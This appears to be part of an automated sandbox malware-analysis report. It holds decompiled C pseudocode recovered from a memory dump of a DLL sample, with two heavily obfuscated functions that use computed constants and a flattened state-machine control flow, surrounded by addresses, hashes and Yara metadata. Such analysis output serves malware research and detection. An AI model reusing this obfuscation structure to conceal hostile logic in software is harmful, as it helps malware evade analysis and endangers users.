                                                                                                          0x02af2710
                                                                                                          0x02af2719
                                                                                                          0x02af2720
                                                                                                          0x02af2731
                                                                                                          0x02af275d
                                                                                                          0x02af276b
                                                                                                          0x02af276d
                                                                                                          0x02af2778
                                                                                                          0x02af277d
                                                                                                          0x02af2780
                                                                                                          0x00000000
                                                                                                          0x02af2780
                                                                                                          0x02af263f
                                                                                                          0x02af26b4
                                                                                                          0x02af26b5
                                                                                                          0x02af26b8
                                                                                                          0x02af26bd
                                                                                                          0x02af26c5
                                                                                                          0x02af26df
                                                                                                          0x02af26e7
                                                                                                          0x02af26ec
                                                                                                          0x02af26f2
                                                                                                          0x02af26f5
                                                                                                          0x02af26fd
                                                                                                          0x02af26ff
                                                                                                          0x02af2702
                                                                                                          0x02af2705
                                                                                                          0x02af2708
                                                                                                          0x02af2628
                                                                                                          0x02af2628
                                                                                                          0x02af2628
                                                                                                          0x00000000
                                                                                                          0x02af2628
                                                                                                          0x02af2628
                                                                                                          0x02af2643
                                                                                                          0x02af27b7
                                                                                                          0x02af27c4
                                                                                                          0x02af27d7
                                                                                                          0x02af27e4
                                                                                                          0x02af27ef
                                                                                                          0x02af27f8
                                                                                                          0x02af27f8
                                                                                                          0x02af264f
                                                                                                          0x02af27a6
                                                                                                          0x00000000
                                                                                                          0x02af27ac
                                                                                                          0x02af2657
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02af2661
                                                                                                          0x02af267b
                                                                                                          0x02af2682
                                                                                                          0x02af2687
                                                                                                          0x02af268e
                                                                                                          0x02af269a
                                                                                                          0x02af2690
                                                                                                          0x02af2692
                                                                                                          0x02af2697
                                                                                                          0x02af2697
                                                                                                          0x00000000
                                                                                                          0x02af2785
                                                                                                          0x02af2785
                                                                                                          0x02af2785
                                                                                                          0x00000000
                                                                                                          0x02af2791

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )^^$:*$J;$b$f
                                                                                                          • API String ID: 0-204930537
                                                                                                          • Opcode ID: 4c82a8b4920395cacab6d527b37214b9549e521a032a6f51dcaa5c9c3dd06025
                                                                                                          • Instruction ID: fcfa9ce81dab37bdbe4af3dfa54eba54b739258ff082dbf7784c799a181056de
                                                                                                          • Opcode Fuzzy Hash: 4c82a8b4920395cacab6d527b37214b9549e521a032a6f51dcaa5c9c3dd06025
                                                                                                          • Instruction Fuzzy Hash: 1CF132715083819FC3A8CF65D58AA0BFBF2FBC4758F10891DF69986260DBB58949CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B02009, Relevance: 6.5, Strings: 5, Instructions: 275COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02B02009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E02AE556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E02AF654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E02AFE1F8(0x2ae1080, _v1056, __eflags);
							_t320 = E02AEDC1B(_v1172);
							_t340 =  *0x2b06214; // 0x0
							_t321 =  *0x2b06214; // 0x0
							E02B044AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E02AFFECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E02AFE1F8(0x2ae1000, _v1156, __eflags);
					_t333 =  *0x2b06214; // 0x0
					_t312 =  *0x2b06214; // 0x0
					__eflags = _t312 + 0x23c;
					E02B02D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E02AFFECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

























































                                                                                                          0x02b02009
                                                                                                          0x02b0200f
                                                                                                          0x02b02019
                                                                                                          0x02b02024
                                                                                                          0x02b0202f
                                                                                                          0x02b02037
                                                                                                          0x02b0203f
                                                                                                          0x02b02044
                                                                                                          0x02b0204c
                                                                                                          0x02b0205e
                                                                                                          0x02b02063
                                                                                                          0x02b02069
                                                                                                          0x02b0206e
                                                                                                          0x02b02073
                                                                                                          0x02b0207b
                                                                                                          0x02b02083
                                                                                                          0x02b0208b
                                                                                                          0x02b02093
                                                                                                          0x02b020a0
                                                                                                          0x02b020a1
                                                                                                          0x02b020a5
                                                                                                          0x02b020ad
                                                                                                          0x02b020b5
                                                                                                          0x02b020b9
                                                                                                          0x02b020be
                                                                                                          0x02b020c6
                                                                                                          0x02b020ce
                                                                                                          0x02b020d6
                                                                                                          0x02b020de
                                                                                                          0x02b020e6
                                                                                                          0x02b020ee
                                                                                                          0x02b020fc
                                                                                                          0x02b02100
                                                                                                          0x02b02108
                                                                                                          0x02b02110
                                                                                                          0x02b02115
                                                                                                          0x02b0211a
                                                                                                          0x02b0211f
                                                                                                          0x02b02127
                                                                                                          0x02b0212f
                                                                                                          0x02b02134
                                                                                                          0x02b0213c
                                                                                                          0x02b02144
                                                                                                          0x02b02149
                                                                                                          0x02b02151
                                                                                                          0x02b02159
                                                                                                          0x02b02161
                                                                                                          0x02b0216e
                                                                                                          0x02b02172
                                                                                                          0x02b0217a
                                                                                                          0x02b02182
                                                                                                          0x02b0218a
                                                                                                          0x02b02192
                                                                                                          0x02b0219a
                                                                                                          0x02b021a2
                                                                                                          0x02b021af
                                                                                                          0x02b021b3
                                                                                                          0x02b021bb
                                                                                                          0x02b021c3
                                                                                                          0x02b021c8
                                                                                                          0x02b021d0
                                                                                                          0x02b021d8
                                                                                                          0x02b021e0
                                                                                                          0x02b021e8
                                                                                                          0x02b021f0
                                                                                                          0x02b021f8
                                                                                                          0x02b02200
                                                                                                          0x02b02208
                                                                                                          0x02b02215
                                                                                                          0x02b02220
                                                                                                          0x02b0222b
                                                                                                          0x02b02239
                                                                                                          0x02b0223e
                                                                                                          0x02b02244
                                                                                                          0x02b0224c
                                                                                                          0x02b02254
                                                                                                          0x02b0225e
                                                                                                          0x02b02261
                                                                                                          0x02b02265
                                                                                                          0x02b0226d
                                                                                                          0x02b02275
                                                                                                          0x02b0227d
                                                                                                          0x02b02282
                                                                                                          0x02b0228a
                                                                                                          0x02b02292
                                                                                                          0x02b022a2
                                                                                                          0x02b022a6
                                                                                                          0x02b022ab
                                                                                                          0x02b022b0
                                                                                                          0x02b022b8
                                                                                                          0x02b022c0
                                                                                                          0x02b022c5
                                                                                                          0x02b022cd
                                                                                                          0x02b022d8
                                                                                                          0x02b022e3
                                                                                                          0x02b022ee
                                                                                                          0x02b022f6
                                                                                                          0x02b022fe
                                                                                                          0x02b02306
                                                                                                          0x02b02311
                                                                                                          0x02b0231c
                                                                                                          0x02b02327
                                                                                                          0x02b0232f
                                                                                                          0x02b02337
                                                                                                          0x02b0233f
                                                                                                          0x02b0234c
                                                                                                          0x02b0234f
                                                                                                          0x02b02353
                                                                                                          0x02b02357
                                                                                                          0x02b0235c
                                                                                                          0x02b02364
                                                                                                          0x02b02374
                                                                                                          0x02b02378
                                                                                                          0x02b02380
                                                                                                          0x02b02388
                                                                                                          0x02b02390
                                                                                                          0x02b02398
                                                                                                          0x02b023a0
                                                                                                          0x02b023ab
                                                                                                          0x02b023b6
                                                                                                          0x02b023c1
                                                                                                          0x02b023cd
                                                                                                          0x02b023d0
                                                                                                          0x02b023d4
                                                                                                          0x02b023dc
                                                                                                          0x02b023e1
                                                                                                          0x02b023e9
                                                                                                          0x02b023f1
                                                                                                          0x02b023f9
                                                                                                          0x02b02401
                                                                                                          0x02b02406
                                                                                                          0x02b0240e
                                                                                                          0x02b02416
                                                                                                          0x02b02423
                                                                                                          0x02b02427
                                                                                                          0x02b0242f
                                                                                                          0x02b02437
                                                                                                          0x02b02442
                                                                                                          0x02b0244d
                                                                                                          0x02b02460
                                                                                                          0x02b02474
                                                                                                          0x02b02474
                                                                                                          0x02b0247e
                                                                                                          0x00000000
                                                                                                          0x02b025e3
                                                                                                          0x02b02486
                                                                                                          0x02b02498
                                                                                                          0x02b024a1
                                                                                                          0x02b024a5
                                                                                                          0x02b024b0
                                                                                                          0x02b024bb
                                                                                                          0x02b024c7
                                                                                                          0x02b024de
                                                                                                          0x02b02506
                                                                                                          0x02b02523
                                                                                                          0x02b02528
                                                                                                          0x02b0252b
                                                                                                          0x00000000
                                                                                                          0x02b0252b
                                                                                                          0x02b0248e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b02494
                                                                                                          0x02b02494
                                                                                                          0x02b02532
                                                                                                          0x02b0253b
                                                                                                          0x02b0253f
                                                                                                          0x02b02547
                                                                                                          0x02b0254c
                                                                                                          0x02b02571
                                                                                                          0x02b0257d
                                                                                                          0x02b02587
                                                                                                          0x02b025a7
                                                                                                          0x02b025ac
                                                                                                          0x02b025af
                                                                                                          0x02b025b1
                                                                                                          0x02b025b1
                                                                                                          0x02b025b1
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: j8$qUO$-9$Hz$XGH
                                                                                                          • API String ID: 0-60989354
                                                                                                          • Opcode ID: d73923a7946cef3a177f6080cbc9621f077fec216042af41b7065cc3ffe80481
                                                                                                          • Instruction ID: 301a3ad59f7d9d5bf4441cdf5d30073458f18c4c5507400c8f8b34f10a04e72f
                                                                                                          • Opcode Fuzzy Hash: d73923a7946cef3a177f6080cbc9621f077fec216042af41b7065cc3ffe80481
                                                                                                          • Instruction Fuzzy Hash: AEE132714087809FC3A8CF65C589A4BBBF1FBC4748F508A1CF6DA86260D7B48958CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B03EE9, Relevance: 6.5, Strings: 5, Instructions: 273COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02B03EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E02AFE1F8(0x2ae1758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E02AEF96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E02AFFECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0x2b06228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E02AF3D85( *(_t344 + 0x60), 0x2b06000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E02B02B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E02AEC5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0x2b06228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0x2b06228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}






















                                                                                                          0x02b03eec
                                                                                                          0x02b03ef3
                                                                                                          0x02b03ef8
                                                                                                          0x02b03efd
                                                                                                          0x02b03f05
                                                                                                          0x02b03f0d
                                                                                                          0x02b03f15
                                                                                                          0x02b03f1d
                                                                                                          0x02b03f2e
                                                                                                          0x02b03f38
                                                                                                          0x02b03f3d
                                                                                                          0x02b03f43
                                                                                                          0x02b03f48
                                                                                                          0x02b03f50
                                                                                                          0x02b03f58
                                                                                                          0x02b03f60
